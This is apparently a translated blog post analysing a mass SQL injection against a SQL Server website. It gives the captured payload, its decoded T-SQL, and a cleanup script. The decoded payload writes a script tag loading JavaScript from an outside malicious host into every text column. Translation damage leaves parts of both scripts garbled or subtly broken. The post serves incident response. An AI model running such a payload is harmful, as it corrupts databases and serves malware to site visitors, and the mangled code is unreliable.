About injection (CSS/C. JS)

In the past few days, the website of a friend has been maliciously injected by people who have been damaged every day. This may be the reason why the program has not been written. Each field in the database has a script (<SCRIPT src = http: // % 63% 2enuclear3.com/css/c.js> </SCRIPT>. The script address may change from time to time ). Search by some search engines:/CSS/C. js> </SCRIPT> and find that many websites have this problem. The injection prototype captured through IIS logs is as follows:

; Declare @ s nvarchar (4000); Set @ s = cast

(Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

400650020005400610062006c0065005f0043007500720073006f007200 as nvarchar (4000); Exec (@ s );--

The preceding SQL statement in cast is decrypted as follows:

 Declare @T Varchar(255),@C Varchar(255)

Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And

A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)

Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0)

Begin 
Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<Script

Src=http://%63%2Enuclear3.com/css/c.js></Script>''')Fetch Next From  Table_Cursor Into @T,@C 
End

Close Table_Cursor

Deallocate Table_Cursor

Summary:

It is still the reason why the program is not well written, which will lead to injection. I hope to pay attention to this problem when writing the program in the future, but think about using the DOTNET parameter value, the possibility of injection should be zero.

This friend was most afraid of data loss and hoped to recover the data. So I helped him write an SQL script for clearing fields (only suitable for sqlserver ). Oh, I also hope to facilitate the cleaning of the injected website. The Code is as follows:

Declare @ name as nvarchar (128), @ columnname as nvarchar (128), @ columntype as nvarchar (128), @ injectsql as nvarchar (111)
Set @ injectsql = '<SCRIPT src = http: // % 63% 2enuclear3.com/css/c.js> </SCRIPT>'
Declare curlabel cursor for select name from sysobjects where xtype = 'U'
Open curlabel
Fetch next from curlabel into @ name
While @ fetch_status = 0
Begin
Declare curlabel1 cursor for select column_name, data_type from information_schema.columns where (table_name = @ name)
Open curlabel1
Fetch next from curlabel1 into @ columnname, @ columntype
While @ fetch_status = 0
Begin
If (@ columntype = 'text' or @ columntype = 'text '))
-- Print 1
Begin try
Declare @ primarykey nvarchar (255 );
Select @ primarykey = primarykey from
(Select
C. Name as primarykey,
Case when C. colid in (select IK. colid
From sysindexes I, sysindexkeys Ik, sysobjects oo
Where I. ID = IK. ID and I. indid = IK. indid
And I. Name = oo. Name and OO. xtype = 'pk' -- primary key
And O. ID = I. ID
) Then 1 else 0 end isprimarykey
From sysobjects o inner join syscolumns C on O. ID = C. ID
Where o. xtype = 'U'
And O. Name = @ name) as t where isprimarykey = 1

       exec('declare @ptr varbinary(16);declare @id nvarchar(16);declare curText scroll Cursor for select textptr('+@columnName+'),'+@primaryKey+' from '+@name+';declare @Position int,@len int;OPEN curText;FETCH NEXT FROM curText INTO @ptr,@id;WHILE @@FETCH_STATUS=0 BEGIN;select @Position=patindex(''%'+@injectSql+'%'','+@columnName+') from '+@name+' where '+@primaryKey+'=@id;while @Position>0 begin;set @Position=@Position-1;updatetext '+@name+'.'+@columnName+' @ptr @Position @len '''';select @Position=patindex(''%'+@injectSql+'%'','+@columnName+') from '+@name+' where '+@primaryKey+'=@id;end;FETCH NEXT FROM curText INTO @ptr,@id;END;CLOSE curText;DEALLOCATE curText')
      END TRY
      BEGIN CATCH
       print(@name+'.'+@columnName)
      END CATCH;
     else
      if(@columnType='nvarchar' or @columnType='varchar')
      exec('update '+@name+' set '+@columnName+'=replace('+@columnName+','''+@injectSql+''','''')')
    
    FETCH NEXT FROM curLabel1 INTO @columnName,@columnType
    END
    CLOSE curLabel1
    DEALLOCATE curLabel1
          FETCH NEXT FROM curLabel INTO @name
          END
          CLOSE curLabel
          DEALLOCATE curLabel